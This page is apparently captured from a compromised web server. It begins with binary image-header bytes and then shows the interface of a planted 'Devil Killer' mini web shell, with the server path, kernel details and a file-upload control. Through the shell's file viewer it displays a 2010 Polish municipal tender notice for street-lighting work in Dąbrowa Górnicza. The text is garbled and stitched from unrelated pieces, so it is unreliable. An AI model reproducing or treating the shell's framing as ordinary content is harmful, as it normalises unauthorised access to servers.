JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100420/89753-N-2010.html

<p class="kh_header"><b>Dąbrowa Górnicza: Dobudowa punktów świetlnych na terenie miasta</b><br>
<b>Numer ogłoszenia: 89753 - 2010; data zamieszczenia: 20.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Graniczna 21, 41-300 Dąbrowa Górnicza, woj. śląskie, tel. 032 2956700, faks 032 2625032, 2956700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dabrowa-gornicza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dobudowa punktów świetlnych na terenie miasta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia obejmuje: 

1.1.dokonanie uzgodnień z użytkownikami innego uzbrojenia terenu, opracowanie mapy do celów projektowych,
1.2.sporządzenie, w oparciu o program funkcjonalno-użytkowy stanowiący Załącznik nr 8 do SIWZ projektów technicznych dla zadań wymienionych w punkcie 3.3.2. SIWZ, uwzględniając opis, plan sytuacyjny oraz warunki przyłączenia wydane przez ENION S.A. Oddział w Będzinie BZE oraz wskazania Zamawiającego,
1.3.uzgodnienie projektów w ENION S.A. w zakresie zgodności z warunkami przyłączenia,
1.4.uzgodnienie sporządzonych projektów z Zamawiającym oraz uzyskanie jego pisemnej akceptacji przed zgłoszeniem projektu do organu administracji architektoniczno-budowlanej i nadzoru budowlanego,
1.5.dokonanie zgłoszeń do w/w organu, dotyczących prac nie wymagających uzyskania pozwolenia na budowę bądź uzyskanie pozwolenia na budowę w przypadkach określonych ustawą z dnia 7 lipca 1994r. Prawo budowlane (t.j. Dz.U. z 2006r. nr 156 poz. 1118 z późn. zmian.), 
1.6.budowę oświetlenia ulicznego zgodnie z zatwierdzonym projektem technicznym i warunkami przyłączenia,
1.7.sporządzenia dokumentacji powykonawczej (z domiarami do punktów stałych), inwentaryzacji powykonawczej oraz naniesienia wybudowanych punktów świetlnych na mapie zasadniczej gminy.
1.8.zgłoszenie w ENION wykonania prac zgodnie z projektem i warunkami technicznymi zasilania w celu sprawdzenia technicznego i zezwolenia na przyłączenie do sieci,
1.9.przygotowanie i przekazanie Zamawiającemu niezbędnych dokumentów do skutecznego zgłoszenia zakończenia robót w Powiatowym Inspektoracie Nadzoru Budowlanego, przewidzianych ustawą Prawo budowlane, a w szczególności dokumentów, o których mowa w art. 56 i 57 w/w ustawy. 
2.Lokalizacja i zakres zadań do wykonania:
2.1.ul. Perla - budowa linii kablowej oświetlenia ulicznego YAKY - 155mb, zgodnie z warunkami przyłączenia WR/402186/09,
2.2.ul. Armii Krajowej - dobudowa, linia kablowa YAKY 12mb, linia 	napowietrzna 38mb; warunki przyłączenia WR/402434/09,
2.3.ul. Tysiąclecia - garaże - linia kablowa YAKY 100 mb, warunki przyłączenia WR/402669/09,
2.4.Al. T. Kościuszki / Miejska Biblioteka Publiczna - linia kablowa YAKY 190 	mb, słupy i oprawy parkowe, warunki przyłączenia WR/402370/09,
2.5.Plac zabaw Tysiąclecia - linia kablowa YAKY 165mb, warunki przyłączenia WR/402307/09,
2.6.ul. Robotnicza/Przedszkole - linia napowietrzna ASXS 180mb, warunki przyłączenia WR/402436/09,
2.7.ul. Mickiewicza - linia kablowa YAKY 720 mb, słupy i oprawy parkowe, warunki przyłączenia WR/402267/09,
2.8.ul. Krasińskiego 44-49 - linia kablowa YAKY 220 mb, słupy i oprawy parkowe, warunki przyłączenia WR/402266/09,
2.9.Ul. Krasińskiego 36-42 - linia kablowa YAKY 220mb, słupy i oprawy parkowe, warunki przyłączenia WR/402265/09,
2.10.ul. Krasińskiego 29-33 - linia kablowa YAKY 110 mb, warunki przyłączenia WR/402264/09,
2.11.ul. Kasprzaka SP12/PEC/kort tenisowy - linia kablowa YAKY 180mb, warunki przyłączenia WR/402440/09,
3.Szkice sytuacyjne z naniesionymi trasami sieci oświetlenia ulicznego
planowanych do budowy są zamieszczone na stronie internetowej Urzędu Miejskiego. Istnieje możliwość przegrania na nośnik elektroniczny zainteresowanego w siedzibie Zamawiającego, pokój nr 319 (III piętro).
4.Wykonawca udzieli rękojmi na wykonane roboty i zabudowane materiały na okres 12 miesięcy od dnia bezusterkowego odbioru i zatwierdzenia przez strony protokołu odbioru końcowego oraz gwarancji na okres 36 m-cy licząc od dnia bezusterkowego odbioru i zatwierdzenia przez strony protokołu odbioru końcowego. 
5.Opis zadania znajduje się w programie funkcjonalno-użytkowym - Załącznik Nr 8 do SIWZ z uwzględnieniem postanowień  projektu  umowy - Załącznik Nr 7 do SIWZ, będących integralną częścią SIWZ.
6.W okresie rękojmi i gwarancji Wykonawca zobowiązuje się usunąć wady i usterki nieodpłatnie.
7. Wykonawca zapewni na czas realizacji zamówienia ciągłość ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia, na kwotę nie mniejszą niż 200 000,00 zł (słownie: dwieście tysięcy złotych).
8.   Cała dokumentacja dotycząca przedmiotowego zamówienia znajduje się na stronie internetowej Biuletynu Informacji Publicznej Urzędu Miejskiego w Dąbrowie Górniczej: www.bip.dabrowa-gornicza.pl ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Realizacja zamówienia uzupełniającego odbywać się będzie w zakresie przewidzianym opisem przedmiotu zamówienia tj:. 
1. Roboty budowlane w zakresie budowy linii energetycznych
2. Usługi projektowania systemów zasilania energią elektryczną
3. Instalacje zasilania elektrycznego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.14.00-9, 71.32.31.00-9, 45.31.53.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.W okresie ostatnich pięciu lat przed upływem terminu składania  ofert do udziału 
w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, roboty budowlane w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia. Przez roboty budowlane w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia należy rozumieć robotę budowlaną polegającą na wykonaniu:
1.1.2 robót budowlanych polegających na zaprojektowaniu i budowie oświetlenia ulicznego o wartości minimum 100 000,00 zł brutto każda, 
a roboty wykonane na podstawie tegoż projektu zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone. 
Uwaga: jeżeli zakres wykazanych i udokumentowanych robót budowlanych wraz z projektem jest szerszy niż  wymagany przez Zamawiającego, Wykonawca winien w wykazie robót wskazać rodzaj i wartość, daty i miejsca wykonania robót odpowiadających zakresowi wymaganemu przez Zamawiającego.
wg formuły:spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Dysponują osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć 
w wykonaniu  zamówienia tj.:
1.1.przynajmniej 2 osobami posiadającymi uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 
1.2.przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń elektrycznych i elektroenergetycznych (bez ograniczeń).
1.3.3 osoby z uprawnieniami wykonawczymi (SEP) E i D uzyskanymi na podstawie  §6 rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r., w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz.U. nr 89 poz. 828 z późn. zm.)
Uwaga: Zamawiający dopuszcza posiadanie więcej niż jednego uprawnienia przez jedną osobę.
wg formuły: spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 
200 000,00PLN.
wg formuły: spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz Ofertowy - wzór formularza Załącznik nr 6 do SIWZ (wskazana data podpisania);
2.Kosztorys ofertowy wykonany metodą uproszczoną, polegającą na obliczeniu wartości kosztorysowej zagregowanych robót podanych w przedmiarze jako sumy iloczynów ilości jednostek przedmiarowych robót i ich cen jednostkowych bez podatku od towarów i usług. Opis pozycji w kosztorysie ofertowym winien zawierać opis pozycji przedmiarowych Zamawiającego. Wskazane jest załączenie do oferty zbiorczego zestawienia kosztorysów z podaniem wartości poszczególnych kosztorysów (wg kolejności jak w przedmiarach robót). Suma zestawienia powinna równać się cenie ofertowej. Cenę ofertową (netto, VAT, brutto) należy podawać do dwóch miejsc po przecinku - Przedmiar Załącznik nr 6.1. do SIWZ.
 Ponadto Zamawiający wymaga podania danych wyjściowych do kosztorysowania, tj.:
a. stawki robocizny kosztorysowej            	Rg = .............. zł
b. wskaźnika narzutów kosztów zakupu 	Kz = ............... % liczonych od M
c. wskaźnika narzutów kosztów pośrednich       Kp = .............. % liczony od R+S
d. wskaźnika narzutów zysku Zysk = ............ % liczony od R+S+Kp
3.Pełnomocnictwo do reprezentowania:
3.1.wymagane w przypadku gdy Wykonawcę reprezentuje w postępowaniu osoba bądź osoby, których uprawnienie do reprezentowania nie wynika bezpośrednio z innych załączonych dokumentów, przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
3.2.wymagane w przypadku gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia (dotyczy również spółki cywilnej), przedłożone w formie oryginału lub kopii poświadczonej przez notariusza;
4.Zobowiązanie, w szczególności pisemne, innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, wymagane w przypadku gdy Wykonawca polega na ich zasobach na zasadach określonych w art. 26 ust. 2b ustawy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej umowy w  stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie:
1. zmiany terminu wykonania zamówienia oraz  terminów pośrednich wskazanych 
w harmonogramie rzeczowo-finansowym, o których mowa we wzorze umowy,  w następujących przypadkach:
1.1.wystąpienie siły wyższej. Siła wyższa oznacza wydarzenie nieprzewidywalne     i  poza kontrolą stron niniejszej umowy, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
1.2.wystąpienie nietypowych dla klimatu polskiego warunków atmosferycznych  uniemożliwiających prowadzenie zamówień/robót budowlanych  zgodnie z technologią ich wykonania, np. gradobicia, trąby powietrzne , zjawiska niestandardowe w klimacie polskim,   
1.3.konieczność wykonania  zamówień dodatkowych, o których mowa w art.67 ust.1 pkt 5 Ustawy, których wykonanie jest niezbędne dla prawidłowego wykonania  oraz zakończenia podstawowego przedmiotu zamówienia wraz ze wszystkimi konsekwencjami występującymi w związku z przedłużeniem tego terminu,
1.4.opóźnień w przyłączeniu  obiektu do sieci ogólno miejskiej (elektroenergetycznej), przez gestorów mediów, powstałych  z przyczyn nie leżących  po stronie  Wykonawcy,
1.5.zmiany przepisów prawa Unii Europejskiej lub prawa krajowego, co powoduje konieczność dostosowania dokumentacji do zmiany przepisów, które nastąpiły w trakcie realizacji zamówienia,
1.6.opóźnień w uzyskaniu przez Wykonawcę wymaganych pozwoleń, uzgodnień, decyzji  lub opinii innych organów, niezbędnych do realizacji zadania,
1.7.niedotrzymanie wstępnego przyrzeczenia przez właścicieli nieruchomości, przez którą przebiega planowana inwestycja, co powoduje konieczność przeprojektowania, 
1.8.zaistnienie  odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych kategoria gruntu, kurzawka, skała, niekontrolowane nasypy itp.) skutkujące niemożliwością realizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych,
1.9.zaistnienie odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie nie zinwentaryzowanych podziemnych sieci, urządzeń lub obiektów budowlanych.
2. w pozostałym zakresie zmiany do umowy mogą dotyczyć następujących okoliczności:
2.1.wydłużenie terminu gwarancji w związku z przedłużeniem terminu realizacji zamówienia lub zadeklarowaniem dłuższego terminu gwarancji przez producenta, 
2.2.poprawa jakości lub innych parametrów charakterystycznych dla danego elementu robót 	budowlanych,
2.3.aktualizacja rozwiązań projektowych z uwagi na postęp technologiczny bądź zmiany 	obowiązujących przepisów,
2.4.rezygnacja z części robót budowlanych, m.in. w przypadkach klęsk żywiołowych, powodzi, innych kataklizmów,
2.5. zmiany w kolejności i terminach wykonania robót budowlanych, na skutek zdarzeń losowych, 	opóźnień w dostawie sprzętu, urządzeń, materiałów oraz innych
okoliczności korzystnych dla stron,
2.6.zmiany kluczowego personelu wykonawcy lub zamawiającego na skutek zdarzeń 	losowych, zmian kadrowo - personalnych, utraty wymaganych uprawnień, utraty 	stanowiska,
2.7.zmiany podwykonawców na skutek zdarzeń losowych, wypowiedzenia umowy przez 	generalnego wykonawcę czy powierzenia zamówienia kolejnym podwykonawcom za zgodą Zamawiającego,
2.8.zmiany podwykonawców na zasobach, których Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu pod warunkiem , że nowy podwykonawca  wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o zamówienie publiczne dotychczasowy podwykonawca,
2.9.niezawinionych przez Wykonawcę opóźnień w  uzyskaniu pozwolenia na użytkowanie i uruchomieniu  obiektu,
2.10.zmiany podatku VAT na skutek zmian w przepisach prawnych, 
2.11.waloryzacja wynagrodzenia na skutek zmian w podatku VAT, 
W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy   z przyczyn, o których mowa w pkt. 25.5. SIWZ, Wykonawca zobowiązany jest do
niezwłocznego poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o dokonanie wskazanej zmiany.
4.Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół podpisany przez obie strony.
5.Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać
uzasadnienie faktyczne i prawne.
6.Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
7. Pozostałe kwestie odnoszące się do umowy uregulowane są w Załączniku nr 7 do
SIWZ  projekt umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza, ul. Graniczna 21, Wydział Komunikacji i Drogownictwa, piętro III, pok. nr 319.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.05.2010 godzina 10:00, miejsce: Urząd Miejski w Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza, ul. Graniczna 21, Wydział Komunikacji i Drogownictwa, piętro III, pok. nr 319.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 9.2.2. SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2.Dokumenty, o których mowa w pkt. 1 lit. a) Uwag, powinny być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
3.Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa pkt. 1 Uwag zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania pkt. 2 Uwag stosuje się odpowiednio.
